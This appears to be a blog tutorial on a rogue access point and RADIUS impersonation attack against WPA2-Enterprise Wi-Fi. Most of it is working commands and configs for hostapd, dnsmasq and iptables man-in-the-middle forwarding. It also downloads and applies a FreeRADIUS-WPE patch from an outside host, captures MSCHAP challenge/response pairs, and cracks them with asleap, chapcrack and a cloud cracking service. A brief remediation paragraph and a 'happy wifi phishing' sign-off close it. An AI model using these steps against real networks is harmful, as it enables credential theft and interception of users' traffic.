Rouge Access Point: WPA Enterprise – RADIUS Impersonation Attack

The problem with WPAv2 enterprise networks is that all the normal WEP/WPAv2 TKIP type attacks do not work.  To get around this, Josh Wright developed a method to be able to capture username/password combinations for WPAv2 Enterprise grade wireless using a RADIUS server. The following is guide for setting up a rouge wireless access point and RADIUS authentication server, with the end goal of capturing WPA enterprise credentials for wireless access and more:

Start by setting up a fake AP:

apt-get install -y hostapd dnsmasq wireless-tools iw wvdial

sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd

cat < /etc/dnsmasq.conf
log-facility=/var/log/dnsmasq.log
#address=/#/192.168.1.1
#address=/google.com/192.168.1.1
interface=wlan1
dhcp-range=192.168.1.10,192.168.1.250,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
#no-resolv
log-queries
EOF

service dnsmasq start

ifconfig wlan1 up
ifconfig wlan1 192.168.1.1/24

For Internet forwarding from a host machine connected to a legitimate wifi, this is good for man in the middling traffic going through an unauthenticated access point:
iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward

This is the configuration for an unauthenticated rouge AP:
cat < /etc/hostapd/hostapd.conf
interface=wlan1
driver=nl80211
ssid=FreeWifi
channel=1
#Support for the Karma attack.
#enable_karma=1
EOF

This is the configuration for a rouge AP with WPA-EAP:
cat < /etc/hostapd/hostapd.conf
interface=wlan1
driver=nl80211
ssid=EnterpriseWifi
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=2
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=TKIP CCMP
#Support for the Karma attack.
#enable_karma=1
EOF

Make sure you have your Wireless dongle plugged in, then start your access point:
iwconfig
service hostapd start


Next we need to configure a RADIUS server, but before we configure your Radius server, we need to first download it and the modify it:

Start by downloading the server:
wget http://ftp.cc.uoc.gr/mirrors/ftp.freeradius.org/freeradius-server-2.1.12.tar.bz2
tar xfj freeradius-server-2.1.12.tar.bz2
cd freeradius-server-2.1.12

We need to patch our Radius server:
wget http://willhackforsushi.com/code/freeradius-wpe-2.1.12.patch
patch -p1 < freeradius-wpe-2.1.12.patch
./configure && make && make install

edit the configurations:
cat >> clients.conf <client 192.168.1.1 {
secret = mysecret
}
EOF


If they use domain creds for wpa-enterprise, you will want to add:
nano /usr/local/etc/raddb/modules/mschap
with_ntdomain_hack = yes


radiusd –X

You can view captured challenge and response pairs in a separate terminal:
tail -f /usr/local/var/log/radius/freeradius-server-wpe.log


Before you can crack the passwords, you need to convert a word list to be used with the Asleap application.  This can be accomplished with the following code by converting the darkc0de password list into multiple output files for Asleap.

genkeys -r darkc0de.lst -f words.dat -n words.idx

Asleap is a tool to recover LEAP and PPTP type connections utilizing a password list from genkeys. Asleap will take in the challenge and responses as demonstrated below:

asleap -f words.dat -n words.idx -C 07:50:7b:b7:a6:4d:24:d1 -R fc:9d:19:06:c0:79:c3:f5:ad:db:6b:80:59:2f:7f:6e:d8:05:19:c4:5d:26:30:08

You can also use Asleap w/ a plaintext wordlist such as Rockyou:

asleap -W Rockyou.txt -C 07:50:7b:b7:a6:4d:24:d1 -R fc:9d:19:06:c0:79:c3:f5:ad:db:6b:80:59:2f:7f:6e:d8:05:19:c4:5d:26:30:08

You can also crack any MSCHAP based challenge and response in under 24 hours w/ the CloudCrack service. First you will need to download chapcrack from: https://github.com/moxie0/chapcrack

python chapcrack.py radius -C 07:50:7b:b7:a6:4d:24:d1 -R fc:9d:19:06:c0:79:c3:f5:ad:db:6b:80:59:2f:7f:6e:d8:05:19:c4:5d:26:30:08 > user.mschap

Then trim response to only something like this before submitting:
$99$eXb5DkI5RS9ng6MgpBg38g7mE52xRB2NOU4=

Then use Movie's service at https://www.cloudcracker.com/ for cracking MS-CHAPv2 (PPTP & WPA-E) in under 24hrs!


The remediation for this one is pretty straight forward.  Enable clients to only connect to an access point if it has a trusted, pre-installed certificate for that server. Clients should not trust certs signed with public certificate authorities, and if they do, only trust the root certificate authority that you need to. Lastly, clients should not prompt the user when presented with an untrusted certificate, but rather should fail silently.


Enjoy, and happy wifi phishing :)